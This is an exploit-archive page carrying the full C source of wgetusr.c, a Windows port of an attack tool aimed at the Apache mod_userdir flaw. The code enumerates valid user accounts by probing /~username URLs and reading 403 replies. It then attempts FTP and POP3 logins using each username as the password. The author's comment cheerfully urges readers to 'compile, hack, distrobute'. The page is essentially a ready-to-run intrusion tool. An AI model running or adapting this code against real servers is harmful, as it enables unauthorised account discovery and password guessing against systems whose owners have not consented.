Exploit the possiblities

wgetusr.c

wgetusr.c
Posted Jul 23, 2004
Authored by CoKi | Site nosystem.com.ar

Exploit that makes use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers. Ported to Windows by John Bissell.

tags | exploit
systems | windows
MD5 | f31b7dbf6a8e67ce8d301fa3f4d4e38b

wgetusr.c

Change Mirror Download


/*-------------------------------------------------------------------
*
* Exploit: wgetusr.c Windows Version
* Author: HighT1mes (John Bissell)
* Date Released: July 21, 2004
*
* --- Code ported to Windows with some added code,
* based on getusr.c exploit by CoKi ---
*
* Description from CoKi:
* ======================
*
* This tool tries to find users in a Apache 1.3.*
* server through wrong default configuration of
* module mod_userdir.
*
* My Believe:
* ===========
*
* I believe in the current state of the web right
* now this information leak bug can be pretty nasty.
* Once you have a couple login names on a system
* there are many services the attacker can target
* to attack and work his way into the target system
* to get local access.
*
* Program Usage:
* ==============
*
* Use: wgetusr [options] -h <host> -u <usrfile>
* -h Host
* -u Users file
* Options
* -f Try log on via FTP
* -p Try log on via POP3
*
* VC++ 6.0 Compilation Information:
* =================================
*
* First go on the net and get the getopt libs and header
* file for VC++ 6.0 Here's a link...
*
* http://prantl.host.sk/getopt/files/getopt-msvs6.zip
*
* Now extract the libs into your standerd VC++ Lib directory,
* and extract the getopt.h header file of course into the
* Include directory.
*
* Now to compile make a new console app project,
* then put this source file in the project.
* Next goto Project->Settings. Then click on
* the link tab then goto the input catagory.
* Now add getopt.lib to the end of objects/librarys
* modules text box. Then in the Ignore Librarys
* text box type LIBCD.lib to ignore that lib and allow
* compilation to complete because of getopt lib.
*
* Also you where you added getopt.lib to the
* objects/librarys modules text box put ws2_32.lib
* in that text box as well.
*
* Your all set compile, hack, distrobute, have fun! :)
*
*-------------------------------------------------------------------*/

#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <windows.h>

#define DATAMAX 50
#define BUFFER 1000
#define TCPIP_ERROR -1
#define TIMEOUT 3
#define HTTP_PORT 80
#define FTP_PORT 21
#define POP3_PORT 110

void use(char *program);
int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout);
void vrfy_apache(char *host);
void vrfy_vuln(char *host);
int test_user(char *host, char *user);
int trylogonFTP(char *host, char *user, char *pass);
int mkconn(char *host, unsigned short port);
int trylogonPOP3(char *host, char *user, char *pass);

struct hostent *he;
char **fuser;
int sockfd;
struct sockaddr_in dest_dir;

int main(int argc, char *argv[]) {

FILE *userlist;
char c, *host=NULL, *ulist=NULL;
char user[DATAMAX];
int ucant=0, flogged=0, plogged=0, optftp=0, optpop=0, stop=0;
unsigned int cant=0, i, user_num;
WSADATA wsaData;
int result=0;

printf(" =================================\n");
printf(" wgetusr exploit by HighT1mes\n");
printf(" Based on getusr.c code by CoKi\n");
printf(" =================================\n\n");
Sleep(1000);

if(argc < 2) use(argv[0]);

result = WSAStartup( MAKEWORD( 2,2 ), &wsaData );
if ( result != NO_ERROR ) {
printf( "Error at WSAStartup()\n" );
return( EXIT_FAILURE );
}

while((c = getopt(argc, argv, "h:u:fp")) != EOF) {
switch(c) {
case 'h':
host = optarg;
break;
case 'u':
ulist = optarg;
break;
case 'f':
optftp = 1;
break;
case 'p':
optpop = 1;
break;
default :
use(argv[0]);
break;
}
}

if(host == NULL) use(argv[0]);
if(ulist == NULL) use(argv[0]);

printf(" [+] verifying list:\t");

if((userlist = fopen(ulist, "r")) == NULL) {
printf("Failed\n\n");
exit(1);
}

while(!feof(userlist)) if('\n' == fgetc(userlist)) ucant++;
rewind(userlist);

printf("OK (%d users)\n", ucant);
Sleep(1000);
fuser = (char **)malloc(sizeof(ucant));

printf(" [+] verifying host:\t");

if((he=gethostbyname(host)) == NULL) {
perror("Error: ");
Sleep(1000);
printf("\n");
exit(1);
}

printf("OK\n");
Sleep(1000);

printf(" [+] connecting:\t");

if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) {
printf("Closed\n\n");
Sleep(1000);
exit(1);
}

printf("OK\n");
Sleep(1000);
closesocket(sockfd);

vrfy_apache(host);
Sleep(1000);

vrfy_vuln(host);
Sleep(1000);

user_num = 1;
while(!feof(userlist)) {
if(fgets(user, sizeof(user), userlist) == NULL) break;
user[strlen(user)-1] = '\0';

if(test_user(host, user) == 0) {
fuser[cant] = (char *)malloc(sizeof(user));
memcpy(fuser[cant],user,strlen(user));
memset(fuser[cant]+strlen(user),0,1);
cant++;
}

system("CLS");
printf(" wgetusr exploit by HighT1mes\n\n");
printf(" [+] searching for system accounts, please wait...\n");
printf(" [+] processing user #%d\n", user_num);
user_num++;
}

if(cant == 0) {
printf(" no users found\n\n");
exit(1);
}
else {
/* print out valid usernames found */
printf(" [+] scan results for %s:\n\n", host);
for (i = 0; i < cant; i++) {
printf(" found username: %s\n", fuser[i]);
}
}

printf("\n");

if(optftp == 1) {
stop = 0;
printf(" [+] trying log on via FTP...\n");
printf(" [+] connecting:\t");


if(mkconn(host, FTP_PORT) == TCPIP_ERROR) {
printf("Closed\n");
stop = 1;
}

if(!stop) {
printf("OK\n");
closesocket(sockfd);
for(i=0; i < cant; i++) {
if(trylogonFTP(host, fuser[i], fuser[i]) == 0) {
printf(" logged in: %s\n", fuser[i]);
flogged++;
}
}
if(flogged == 0) printf(" no users logged in\n");
}
}

if(optpop == 1) {
stop = 0;
printf(" [+] trying log on via POP3...\n");
printf(" [+] connecting:\t");
(stdout);

if(mkconn(host, POP3_PORT) == TCPIP_ERROR) {
printf("Closed\n");
stop = 1;
}

if(!stop) {
printf("OK\n");
closesocket(sockfd);
for(i=0; i < cant; i++) {
if(trylogonPOP3(host, fuser[i], fuser[i]) == 0) {
printf(" logged in: %s\n", fuser[i]);
plogged++;
}
}
if(plogged == 0) printf(" no users logged in\n");
}
}

printf("\n");
fclose(userlist);
WSACleanup();
return 0;
}

void use(char *program) {
printf("Use: %s [options] -h <host> -u <usrfile>\n", program);
printf(" -h\tHost\n");
printf(" -u\tUsers file\n");
printf(" Options\n");
printf(" -f\tTry log on via FTP\n");
printf(" -p\tTry log on via POP3\n");
exit(1);
}

int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout)
{
int res, slen, flags;
struct timeval tv;
struct sockaddr_in addr;
fd_set rdf, wrf;
int iMode = 0;

ioctlsocket(sfd, FIONBIO, &iMode);

res = connect(sfd, serv_addr, sizeof(struct sockaddr));

if (res >= 0) return res;

FD_ZERO(&rdf);
FD_ZERO(&wrf);

FD_SET(sfd, &rdf);
FD_SET(sfd, &wrf);
memset(&tv, 0, sizeof(tv));
tv.tv_sec = timeout;

if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)
return -1;

if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {
slen = sizeof(addr);
if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)
return -1;

flags = ioctlsocket(sfd, FIONBIO, NULL);
iMode = flags & ~iMode;
ioctlsocket(sfd, FIONBIO, &iMode);

return 0;
}

return -1;
}

void vrfy_apache(char *host) {
char buf[BUFFER], sendstr[DATAMAX];

printf(" [+] verifying Apache:\t");

if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n");

sprintf(sendstr, "HEAD / HTTP/1.0\n\n");
send(sockfd, sendstr, sizeof(sendstr), 0);
memset(buf, 0, sizeof(buf));
recv(sockfd, buf, sizeof(buf), 0);

if(strstr(buf, "Server: Apache")) printf("OK\n");
else {
printf("NO\n\n");
exit(1);
}

closesocket(sockfd);
}

void vrfy_vuln(char *host) {
char buf[BUFFER], sendstr[DATAMAX];

printf(" [+] vulnerable:\t");

if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n");

memset(sendstr, 0, sizeof(sendstr));
sprintf(sendstr, "GET /~root\n");
send(sockfd, sendstr, sizeof(sendstr), 0);

recv(sockfd, buf, sizeof(buf), 0);

if(strstr(buf, "403")) printf("OK\n");
else {
printf("NO\n\n");
exit(1);
}

closesocket(sockfd);
}

int test_user(char *host, char *user) {
char buf[BUFFER], sendstr[DATAMAX];

if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf(" Closed\n");

memset(sendstr, 0, sizeof(sendstr));
sprintf(sendstr, "GET /~%s\n", user);
send(sockfd, sendstr, sizeof(sendstr), 0);

recv(sockfd, buf, sizeof(buf), 0);

if(strstr(buf, "403")) return 0;
else return 1;

closesocket(sockfd);
}

int trylogonFTP(char *host, char *user, char *pass) {
char buf[BUFFER], *senduser, *sendpass;

senduser = malloc(sizeof(user+6));
sendpass = malloc(sizeof(pass+6));

sprintf(senduser,"USER %s\n",user);
sprintf(sendpass,"PASS %s\n",pass);

if(mkconn(host, FTP_PORT) == TCPIP_ERROR) printf(" Closed\n");

memset(buf,0,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,senduser,strlen(senduser), 0);
memset(buf,0,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,sendpass,strlen(sendpass), 0);
memset(buf,0,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);

if(strstr(buf, "230")) return 0;
else return 1;

closesocket(sockfd);
}

int mkconn(char *host, unsigned short port) {

if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == TCPIP_ERROR) {
perror("Error");
printf("\n");
exit(1);
}

dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(port);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(dest_dir.sin_zero), 0, 8);

if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir, TIMEOUT) == TCPIP_ERROR) {
return TCPIP_ERROR;
}

return 0;
}

int trylogonPOP3(char *host, char *user, char *pass) {
char buf[BUFFER], *senduser, *sendpass;

senduser = malloc(sizeof(user+6));
sendpass = malloc(sizeof(pass+6));

sprintf(senduser,"USER %s\n",user);
sprintf(sendpass,"PASS %s\n",pass);

if(mkconn(host, POP3_PORT) == TCPIP_ERROR) printf(" Closed\n");

memset(buf,0,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,senduser,strlen(senduser), 0);
memset(buf,0,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);
send(sockfd,sendpass,strlen(sendpass), 0);
memset(buf,0,sizeof(buf));
recv(sockfd,buf,sizeof(buf),0);

if(strstr(buf, "+OK")) return 0;
else return 1;

closesocket(sockfd);
}

/* EOF */

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    15 Files
  • 15
    Dec 15th
    28 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close